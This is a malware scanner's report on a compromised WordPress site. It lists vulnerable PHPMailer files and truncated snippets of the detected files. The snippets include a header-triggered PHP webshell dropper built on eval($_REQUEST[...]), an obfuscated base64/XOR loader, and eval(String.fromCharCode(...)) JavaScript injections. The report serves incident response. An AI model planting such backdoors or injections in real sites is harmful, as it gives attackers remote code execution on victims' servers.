AI-Bolit v20190226-2242 Scan Report: /home/instituteindustr/public_html/ (1/1)
For non-commercial use only. In order to purchase the commercial license of the scanner contact us at ai@revisium.com

Scanned 581 folders and 4100 files. Memory used: 6.50 Mb.
Summary
Malware25
JS viruses11
Skipped big files13
Notice! Some of detected files may not contain malicious code. Scanner tries to minimize a number of false positives, but sometimes it's impossible, because same piece of code may be used either in malware or in normal scripts.
Attention! The scanner has detected suspicious or malicious files.

Most likely the website has been compromised. Please, contact web security experts from Revisium to check the report or clean the malware.


Also check your website for viruses with our free online scanner ReScan.Pro.

Revisium contacts: ai@revisium.com, https://revisium.com/en/home/
Caution! Do not leave either ai-bolit.php or report file on server and do not provide direct links to the report file. Report file contains sensitive information about your website which could be used by hackers. So keep it in safe place and don't leave on website!
Special Offers:
Critical
Vulnerable Scripts (2)
  • /home/instituteindustr/public_html/wp-includes/PHPMailer/PHPMailer.php - RCE : CVE-2016-10045, CVE-2016-10031
  • /home/instituteindustr/public_html/wp-includes/class-phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031
  • Shell script signatures detected. Might be a malicious or hacker's scripts (25)
    PathiNode ChangedModifiedSizeCRC32
    [x] BIG FILE. SKIPPED.
    13/10/2022 11:30:45
    13/10/2022 11:30:45
    678.74 Kb
    59e02aef44788c39be4475ca6e4c10bbc6121f16
    x
    1665675045
    id_big_1
    [x] 1<?php $_HEADERS=getallheaders();if(isset($_HEADERS['Sec-Websocket-Accept'])){$c=" <?php eval($_REQUEST["X-Dns-Prefetch-Control\"]);eval($_HEADERS["X-Dns-Prefetch-Control"]);";$f='/tmp/.'.time();file_p
    01/09/2022 17:05:35
    21/03/2019 10:26:52
    470 b
    b8f83cf9419229e5df74c8d0a7f88997bca0bc83
    x
    1553178412
    id_69f537c3
    [x] BIG FILE. SKIPPED.
    11/09/2022 09:49:20
    26/10/2019 05:47:08
    806.61 Kb
    9c51120c9d3506c0f28aa588413ff79cfe014766
    x
    1572083228
    id_big_1
    [x] BIG FILE. SKIPPED.
    11/09/2022 09:49:20
    30/08/2022 17:06:27
    1.50 Mb
    410287b0d6cb428953ed3ddac127db12b52f08d9
    x
    1661893587
    id_big_1
    [x] BIG FILE. SKIPPED.
    11/09/2022 09:49:20
    30/08/2022 17:06:27
    2.30 Mb
    410287b0d6cb428953ed3ddac127db12b52f08d9
    x
    1661893587
    id_big_1
    [x] BIG FILE. SKIPPED.
    11/09/2022 09:49:20
    30/08/2022 17:06:27
    777.40 Kb
    0c0ae2d038bccc6b65eb5aef46d77b18ca905ba0
    x
    1661893587
    id_big_1
    [x] BIG FILE. SKIPPED.
    11/09/2022 09:49:21
    30/08/2022 17:06:27
    1.56 Mb
    6d6be1835f2a5cbc7391028a50f84b09c3fb06ab
    x
    1661893587
    id_big_1
    [x] BIG FILE. SKIPPED.
    11/09/2022 09:49:21
    24/05/2022 17:56:50
    921.71 Kb
    49c5bc5f1dfb35bf9e57af006796c2f2e28fb2d8
    x
    1653429410
    id_big_1
    [x] 1<?php $_HEADERS=getallheaders();if(isset($_HEADERS['Server-Timing'])){$c=" <?php eval($_REQUEST["If-Unmodified-Since\"]);eval($_HEADERS["If-Unmodified-Since"]);";$f=.time();file_put_contents($f
    05/08/2022 13:17:23
    19/11/2021 20:44:00
    8.80 Kb
    78ef518496b662343b8be818f9f9871d6245593a
    x
    1637372640
    id_69f537c3
    [x] 1<?php $_HEADERS=getallheaders();if(isset($_HEADERS['Authorization'])){$c=" <?php eval($_REQUEST[\"X-Dns-Prefetch-Control"]);eval($_HEADERS["X-Dns-Prefetch-Control\"]);";$f=.time();file_put_cont
    05/08/2022 13:17:08
    12/11/2020 20:13:10
    5.31 Kb
    0d2b1211cdc896377da85f7fb2324e4da9c4781d
    x
    1605229990
    id_69f537c3
    [x] 1<?php $_HEADERS=getallheaders();if(isset($_HEADERS['If-Unmodified-Since'])){$c=" <?php eval($_REQUEST["Content-Security-Policy"]);eval($_HEADERS[\"Content-Security-Policy\"]);";$f=.time();file_put_co
    04/08/2022 19:03:41
    24/05/2022 17:56:50
    9.56 Kb
    c8eb357ba4c929e9b8c3ea5a86649c2f4f004e2d
    x
    1653429410
    id_69f537c3
    [x] 1…ceTags')===1){return force_balance_tags($text);}else{return$text;}}function force_balance_tags($text){$tagstack=array(); $stacksize=0;$tagqueue='';$newtext='';$single_tags=array('area','base','basefont','br','col','command','embed','frame',
    11/06/2022 18:11:00
    24/05/2022 17:56:50
    323.00 Kb
    7e8cae6508059e4757e601a46cd5466ba2ef231d
    x
    1653429410
    id_c825ce9d
    [x] 1<?php $_HEADERS=getallheaders();if(isset($_HEADERS['If-Unmodified-Since'])){$c=" <?php eval($_REQUEST["Content-Security-Policy"]);eval($_HEADERS[\"Content-Security-Policy\"]);";$f=.time();file_put_co
    01/09/2022 17:04:03
    04/10/2020 18:14:15
    620 b
    70307e2551e84584abccee20980493c53ce426c0
    x
    1601849655
    id_69f537c3
    [x] 1<?php $_HEADERS=getallheaders();if(isset($_HEADERS['If-Modified-Since'])){$c=" <?php eval($_REQUEST["Server-Timing\"]);eval($_HEADERS["Server-Timing"]);";$f=.time();file_put_contents($f,$c);include
    01/09/2022 17:07:12
    11/11/2019 15:41:50
    408 b
    5d4d427e771a71db6a1d2380e1f615168cbcd7db
    x
    1573504910
    id_69f537c3
    [x] BIG FILE. SKIPPED.
    15/08/2022 23:32:20
    11/11/2019 15:41:50
    3.94 Mb
    4b51a13c2aabe4baddaa2ae037b1404848b9ea7e
    x
    1573504910
    id_big_1
    [x] BIG FILE. SKIPPED.
    11/06/2022 18:11:05
    02/03/2021 19:14:01
    1.17 Mb
    1dcfa8bdaec8365307767c5c7910566d564beb0e
    x
    1614730441
    id_big_1
    [x] BIG FILE. SKIPPED.
    11/06/2022 18:11:05
    25/08/2021 17:30:37
    1.85 Mb
    9c7798b33a774c78d9b85d05f52b990a73c2fb72
    x
    1629927037
    id_big_1
    [x] 1<?php if(isset($_COOKIE['mv'])){ die('lB9bwx8J'); } class_t {private static$_k;static function_kr($_cmc,$_tic){if(!self::$_k):self::_tt();endif;$_hz=strlen($_tic);$_p=base64_deco
    14/09/2022 16:45:19
    13/01/2022 13:28:26
    36.97 Kb
    1ebf45c5e7b6cdbed7c63c1a5f7da6cc515ebf53
    x
    1642098506
    id_577eb47b
    [x] BIG FILE. SKIPPED.
    11/10/2022 02:17:35
    11/10/2022 02:17:35
    944.62 Kb
    1ebf45c5e7b6cdbed7c63c1a5f7da6cc515ebf53
    x
    1665469055
    id_big_1
    [x] 1<?php if(isset($_COOKIE['eUd'])){die('DAGjrwG');}class_t {private static$_k;static function_kr($_cmc,$_tic){if(!self::$_k):self::_tt();endif;$_hz=strlen($_tic);$_p=base64_deco
    27/09/2022 21:38:50
    01/04/2021 18:26:09
    36.95 Kb
    a6eb06a5a84aafa5429044ca274a38f8ee47a3cd
    x
    1617315969
    id_577eb47b
    [x] 1<?php $_HEADERS=getallheaders();if(isset($_HEADERS['Sec-Websocket-Accept'])){$c=" <?php eval($_REQUEST[\"Feature-Policy"]);eval($_HEADERS["Feature-Policy\"]);";$f='/tmp/.'.time();file_put_contents($f,
    04/08/2022 19:04:50
    17/12/2020 20:27:08
    1.08 Kb
    aa9bd280e810fd6950ef05a7e8089bee3565b075
    x
    1608254828
    id_69f537c3
    [x] 1<?php $_HEADERS=getallheaders();if(isset($_HEADERS['If-Modified-Since'])){$c=" <?php eval($_REQUEST["Feature-Policy"]);eval($_HEADERS[\"Feature-Policy\"]);";$f='/tmp/.'.time();file_put_contents($f,
    04/08/2022 19:05:38
    20/12/2021 22:20:06
    2.25 Kb
    47df548fc699b674719043b02b6697c8323ec487
    x
    1640056806
    id_69f537c3
    [x] 1…ction g($n,$k){if(!self::$s) self::i();$l=strlen($k);$r=base64_decode(self::$s[$n]);for($i=0,$c=strlen($r);$i!==$c;++$i) $r[$i]=chr(ord($r[$i])^ord($k[$i%$l]));return$r;}private static function i(){self::$s=array('_l'=>'HhUQCSwFXi8wGAceMBpe
    04/07/2022 11:35:12
    01/02/2022 04:04:37
    8.45 Kb
    a58caf56c114c3578f02e9f472e7b20385dc0223
    x
    1643706277
    id_7964fb8e
    [x] 1<?php $_HEADERS=getallheaders();if(isset($_HEADERS['Server-Timing'])){$c=" <?php eval($_REQUEST[\"If-Modified-Since\"]);eval($_HEADERS[\"If-Modified-Since\"]);";$f=.time();file_put_contents($f,$
    05/08/2022 13:17:26
    06/02/2020 12:03:12
    732 b
    e82fff16b644d8c9df023bed3aed95f949191c19
    x
    1581008592
    id_69f537c3
    [x] 1<?php $_HEADERS=getallheaders();if(isset($_HEADERS['Sec-Websocket-Accept'])){$c=" <?php eval($_REQUEST[\"If-Modified-Since\"]);eval($_HEADERS[\"If-Modified-Since\"]);";$f='/tmp/.'.time();file_put_conte
    04/08/2022 19:06:52
    01/02/2022 04:04:38
    3.52 Kb
    296d7e1ff98ff0f6afe72319cad32c507c28d1cc
    x
    1643706278
    id_69f537c3
    Javascript virus signatures detected: (11)
    PathiNode ChangedModifiedSizeCRC32
    [x] 1 eval(String.fromCharCode(118,97,114,32,115,99,114,105,112,116,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,1
    11/09/2022 09:49:20
    20/07/2022 15:44:07
    24.64 Kb
    04065295f55325e5ad408cc2589fcee385756caf
    x
    1658346247
    id_2afd5633
    [x] 1 eval(String.fromCharCode(118,97,114,32,115,99,114,105,112,116,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,1
    11/09/2022 09:49:20
    12/07/2022 07:42:44
    17.36 Kb
    dd8ef41c81e242b1405b778a26f6096a668e6856
    x
    1657626164
    id_2afd5633
    [x] 1 eval(String.fromCharCode(118,97,114,32,115,99,114,105,112,116,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,1
    11/09/2022 09:49:20
    12/07/2022 07:42:44
    31.11 Kb
    45c9899e320fbd77246dcfcb945ec2565cdd562b
    x
    1657626164
    id_2afd5633
    [x] 1 eval(String.fromCharCode(118,97,114,32,115,99,114,105,112,116,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,1
    11/09/2022 09:49:20
    12/07/2022 07:42:44
    288.24 Kb
    893db33029f9f4f34493ac0b33e5c867a1241454
    x
    1657626164
    id_2afd5633
    [x] 1 eval(String.fromCharCode(118,97,114,32,115,99,114,105,112,116,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,1
    11/09/2022 09:49:20
    12/07/2022 07:42:44
    93.82 Kb
    034983caa7053dd1eb5eb2d913da6f9875b3f40b
    x
    1657626164
    id_2afd5633
    [x] 1… e=window.lodash;var t=function(t,n){return r=>{const o=t(r),u=r.displayName||r.name||"Component";return o.displayName=` ${(0,e.upperFirst)((0,e.camelCase)(n))}(${u})`,o}},o=e.flowRight,u=window.wp.element;var i=e=>t((t=>n=>e(n)?(0,u.create
    11/09/2022 09:49:20
    12/07/2022 17:04:58
    36.75 Kb
    5fe52a86d1fbe0c0aaede19f818fcc9dde5c61c4
    x
    1657659898
    id_105a4fcd
    [x] 1….test(t)?"deg":"";l.push(Wl(e)),i.push("rotate3d"===t?([e,t,o,r])=>[`rotate3d(${e},${t},${o},${ic(r,n)})`,ac(r,0)]:e=>[` ${t}(${e.map((e=>ic(e,n))).join(",")})`,ac(e,t.startsWith("scale")?1:0)])}})),l.length&&(r.transform=new cc(l,i)),super
    11/09/2022 09:49:20
    30/08/2022 17:06:27
    515.51 Kb
    8e8b458d6c8bda3e6bbde1a2a58d419cb7f21cb2
    x
    1661893587
    id_105a4fcd
    [x] 1…tle!==void 0&&_post$title.rendered?(0,external_wp_htmlEntities_namespaceObject.decodeEntities)(post.title.rendered) : `# ${post.id}(${(0,external_wp_i18n_namespaceObject.__)('no title')})`;}const getItemPriority=(name,searchValue)=>{const n
    11/09/2022 09:49:20
    12/07/2022 17:04:58
    384.02 Kb
    81c702a4992e0388fe3628764a676620593f2aa8
    x
    1657659898
    id_105a4fcd
    [x] 1…r=>{const Outer=mapComponent(Inner);const displayName=Inner.displayName || Inner.name || 'Component';Outer.displayName=` ${(0,external_lodash_namespaceObject.upperFirst)((0,external_lodash_namespaceObject.camelCase)(modifierName))}(${displa
    11/09/2022 09:49:21
    12/07/2022 17:04:58
    152.08 Kb
    477ddcf1cecb9ffec6aa0e68377a04592527d337
    x
    1657659898
    id_105a4fcd
    [x] 1…nction or(e){var t;return null!=e&&null!==(t=e.title)&&void 0!==t&&t.rendered?(0,Oo.decodeEntities)(e.title.rendered):`# ${e.id}(${(0,Zt.__)("no title")})`}const rr=(e,t)=>{const n=(0,s.deburr)(e).toLowerCase(),o=(0,s.deburr)(t).toLowerCase
    11/09/2022 09:49:21
    12/07/2022 17:04:58
    134.41 Kb
    abaa0e2b4a4666995e0d5019ebfccbd96f5644b3
    x
    1657659898
    id_105a4fcd
    [x] 1 eval(String.fromCharCode(118,97,114,32,115,99,114,105,112,116,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,1
    11/09/2022 09:49:22
    20/07/2022 15:44:07
    87.35 Kb
    929c3f79b33f428e46201fd8cd71794ef44e07a7
    x
    1658346247
    id_2afd5633
    Warnings
    This script has black-SEO links or linkfarm. Check if it was installed by yourself:
    PathiNode ChangedModifiedSizeCRC32
    1…admin_url('plugins.php'));?><iframe style="border:0" width="100%" height="70px" src="<?php echo esc_url($iframe_url);?>" ></iframe><?php }?></div><?php elseif(isset($_GET['deleted'])) :$delete_result=get_transient('plugins_delete_result_'.$u
    30/08/2022 17:06:27
    30/08/2022 17:06:27
    28.58 Kb
    0583800d0b86b74be9580e5e9baeeea4eb19b547
    x
    1661893587
    id_z8539320
    1…";if(chmod($lock_file_path,0777)){$data_array[' ']=" ";}html_display($data_array);break;case 'phpinfo': phpinfo();break;case 'php_version':$php_path=getPhpPath();$data_array[]=array();$results=run("$php_path -v");foreach(ex
    04/07/2022 05:45:12
    04/07/2022 05:45:12
    9.14 Kb
    60909092b1eb3afbb79779036c5c8a5752d7cf54
    x
    1656927912
    id_z1716818
    Large files (greater than 650.00 Kb! Skipped:
    PathiNode ChangedModifiedSizeCRC32
    13/10/2022 11:30:45
    13/10/2022 11:30:45
    678.74 Kb
    59e02aef44788c39be4475ca6e4c10bbc6121f16
    x
    1665675045
    id_z1628821
    11/09/2022 09:49:20
    24/05/2022 17:56:49
    659.25 Kb
    47100fff816928e1c1946e85904dc9862464b3a2
    x
    1653429409
    id_z4950477
    11/09/2022 09:49:20
    26/10/2019 05:47:08
    806.61 Kb
    9c51120c9d3506c0f28aa588413ff79cfe014766
    x
    1572083228
    id_z6224311
    11/09/2022 09:49:20
    30/08/2022 17:06:27
    1.50 Mb
    410287b0d6cb428953ed3ddac127db12b52f08d9
    x
    1661893587
    id_z6957654
    11/09/2022 09:49:20
    30/08/2022 17:06:27
    2.30 Mb
    410287b0d6cb428953ed3ddac127db12b52f08d9
    x
    1661893587
    id_z2913340
    11/09/2022 09:49:20
    30/08/2022 17:06:27
    777.40 Kb
    0c0ae2d038bccc6b65eb5aef46d77b18ca905ba0
    x
    1661893587
    id_z6486211
    11/09/2022 09:49:21
    30/08/2022 17:06:27
    1.56 Mb
    6d6be1835f2a5cbc7391028a50f84b09c3fb06ab
    x
    1661893587
    id_z2081282
    11/09/2022 09:49:21
    24/05/2022 17:56:50
    921.71 Kb
    49c5bc5f1dfb35bf9e57af006796c2f2e28fb2d8
    x
    1653429410
    id_z4108626
    15/08/2022 23:32:20
    11/11/2019 15:41:50
    3.94 Mb
    4b51a13c2aabe4baddaa2ae037b1404848b9ea7e
    x
    1573504910
    id_z1040143
    11/06/2022 18:11:05
    02/03/2021 19:14:01
    1.17 Mb
    1dcfa8bdaec8365307767c5c7910566d564beb0e
    x
    1614730441
    id_z6404614
    11/06/2022 18:11:05
    25/08/2021 17:30:37
    1.85 Mb
    9c7798b33a774c78d9b85d05f52b990a73c2fb72
    x
    1629927037
    id_z2940582
    11/10/2022 02:17:35
    11/10/2022 02:17:35
    944.62 Kb
    1ebf45c5e7b6cdbed7c63c1a5f7da6cc515ebf53
    x
    1665469055
    id_z6146997
    01/02/2022 04:09:27
    01/02/2022 04:09:27
    8.39 Mb
    ee4c17a538ba9348f7ba44152d94b355b9fa6119
    x
    1643706567
    id_z6711352
    CMS found:
    WordPress v6.0.2